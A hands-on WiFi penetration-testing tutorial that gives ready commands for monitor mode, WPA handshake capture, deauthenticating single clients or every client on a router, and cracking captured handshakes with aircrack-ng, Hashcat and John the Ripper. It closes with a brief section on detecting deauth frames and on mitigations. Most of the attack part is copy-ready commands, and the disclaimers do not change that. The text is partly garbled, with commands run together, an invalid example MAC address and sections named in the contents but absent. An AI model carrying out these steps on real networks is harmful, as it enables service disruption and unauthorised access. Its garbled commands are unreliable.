Practical, hands on WiFi pentesting guide for students and security professionals. Follow these steps only on networks you own or where you have explicit permission to test.
Table of contents
- What this guide covers
- Why WiFi security matters
- Quick start
- Hardware and system requirements
- Recommended adapters and where to buy
- Install drivers and helper scripts
- Basics and monitor mode
- Scanning and handshake capture
- Deauthentication and disruption techniques
- Freeze an AP with authentication floods
- Fake authentication frames
- Beacon flood — multiple fake access points
- Fake portal with airbase-ng
- Automate assessments with Airgeddon
- Evil twin attack
- Cracking handshakes — aircrack, Hashcat, John
- 2.4 GHz and 5 GHz scanning
- How to detect deauthentication attacks
- Security hardening and mitigation
- Legal and ethical rules
Practical, hands on WiFi pentesting: recon, handshake capture, cracking, controlled disruption testing, and clear remediation steps. Designed for authorized security assessments and learning.
Quick highlights
- Map nearby networks and collect authorized WPA handshakes
- Run safe disruption tests in a lab to measure resilience
- Crack captures with wordlists or GPU tools and produce remediation
Legal and ethical note
Obtain written permission before any test. This guide is for defensive security and training only.
This adapter has a Realtek RTL8821AU Chipset. It will cost u ₹1,100 or maybe less. it have a good range and It support in linux community and has driver for Kali linux, Parrot OS ..etc Archer T2U Plus is on sale under 1000 INR, which is a very affordable price and it too good in my opinion for Beginners in Pentesting.
If you don’t have any budget concerns,you can go for this Alfa WiFi adapter, which costs around 4-10k depending on sales or market prices. They have more range
git clone https://github.com/Esther7171/WiFi-Pentesting && cd WiFi-Pentesting && chmod +x install.sh && ./install.sh- This Script will automaticall install Drivers kali as well External Wifi adapters.
The First this is to do Recorganize your wireless adapater name according to your os
- In kali the Default name is
wlan0, If you have 2 wifi adapter connected at same time it will showwlan1
First you need adapter who's support Monitor mode && packet injection if u using this TP-link T2U plus. So ur ready
sudo sudo
su rootiwconfigairmon-ng check kill- wlan0 => interface name .
- WIFI@REALTEK => Is wlan0 nickname u can use both but reccommended wlan0.
- if u have already connected to wifi sometime it show wlan1 or wlan2 rather than wlna0 (in case u have 2 adpater 1 for wifi and second to attack)
ifconfig wlan0 downiwconfig wlan0 mode managed ifconfig wlan0 upiwconfig airmon-ng start wlan0 airodump-ng wlan0 - Copy bssid ofnetwork u like (bssid = mac address show on first row)
- also note the ch (channel number of same router)
-
--bssid => whom u going to attack
-
--channel => to give channel number if it or use [(-c) for channel but sometime it didn't work well ]
-
station => is the device connectedto router.
-
--write => to creat a file where my handshake store
airodump-ng wlan0 --bssid --channel --write /path/Meow.txtairodump-ng wlan0 --bssid -c -w /path/Meow.txtairodump-ng wlan0 --bssid 3C:46:45:1D:5D:31 --channel 11 -w /home/death/Meow.txt- aireplay-ng is powerfull we using itfor deauth people and capture handshake when they try to reconnect.
- -a => router mac addrs.
- -c => device connected with router we going to deauthenticate.
- --deauth / -0 => to send number of deauth packeges.
aireplay-ng wlan0 -a -c --deauth 10aireplay-ng wlan0 -a <bssid> -c <station> -0 <number of packages>aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10aireplay-ng wlan0 -a <bssid> -0 <deauth n.o packages>The captured file (PCAP or .cap) contains the WPA/WPA2 EAPOL handshake or PMKID. Convert or use it directly depending on the cracking tool you choose.
Cracking with aircrack-ng (quick CPU wordlist test)
- Use aircrack-ng for fast CPU-based checks against wordlists:
aircrack-ng /path/Meow-01.cap -w /usr/share/wordlists/rockyou.txtCracking with Hashcat (GPU, recommended for large jobs)
- Convert captures into Hashcat format:
- Using hcxtools (recommended): extract 22000 format (PMKID + EAPOL)
hcxpcapngtool -o handshakes.22000 capture.pcapng- Or use cap2hccapx (older) to create .hccapx
cap2hccapx capture.cap handshakes.hccapx- Run Hashcat (mode 22000 for modern captures):
hashcat -m 22000 handshakes.22000 /path/wordlists/rockyou.txt --status --status-timer=10- Use masks, rules, and combinator attacks for better results. Example hybrid attack with a rule:
hashcat -m 22000 handshakes.22000 /path/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.ruleCracking with John the Ripper
- Convert to a supported format (hccapx) and run John:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=WPAPSK handshakes.hccapxTips and best practices
- Prefer Hashcat with GPU for large wordlists and rule-based attacks.
- Use curated wordlists, rules, and masks before launching exhaustive attacks.
- Collect PMKID and EAPOL where possible; PMKID attacks avoid deauth in some cases.
- Always validate results and document timelines and commands in your report.
Legal reminder
Only attempt cracking on networks you own or where you have explicit written permission. Unauthorized cracking is illegal.
By defualt airdump-ng scan 2.4ghz network to scan 5ghz and 2ghz at same time we have to use --band switch and specify band abg that stand for
airodump-ng wlan0 --band abg
To disrupting network we can use tools such as mdk4 and aireplay-ng. Use them only in authorized tests and with caution.
using aireplay-ng
sudo aireplay-ng wlan0 -a router-bssid -c client-bssid -0 0- -0 sends continuous deauthentication frames
To target the whole router (disconnect every client)
sudo aireplay-ng wlan0 -a router-bssid -0 0Install mdk4
sudo apt install mdk4Common disruption modes (for awareness only)
- Deauthentication flood
- Fake authentication floods to overwhelm APs
- Beacon flood to create many fake SSIDs
- Evil twin and captive portal simulations in controlled lab environments
How to detect deauthentication attacks
Signs of a deauthentication attack
- Many clients disconnecting and reconnecting rapidly
- Repeated EAPOL handshakes captured in a short time window
- High volume of 802.11 management frames with subtype deauthentication
Quick commands to detect and log deauth frames
- Live capture with tshark (shows deauth frames)
tshark -i wlan0 -Y "wlan.fc.type_subtype == 12" -T fields -e frame.time -e wlan.sa -e wlan.da- Save a capture and inspect in Wireshark; use display filter
wlan.fc.type_subtype == 0x0c
- Monitor station activity on the AP interface
watch -n 2 "iw dev wlan0 station dump"What to check on your infrastructure
- AP/syslog entries for frequent disassociations or management frame reasons
- Client reports of intermittent connectivity on the same time window
- Presence of unknown MAC addresses repeatedly sending deauth frames
Mitigations and quick responses
- Enable Protected Management Frames (802.11w / PMF) if supported
- Update access point firmware and enable vendor logging
- Move to a different channel and reboot affected APs as a short term fix
- Use IDS/monitoring to alert on high-rate management frames
- Document incidents, collect captures, and block offending MACs at the controller if available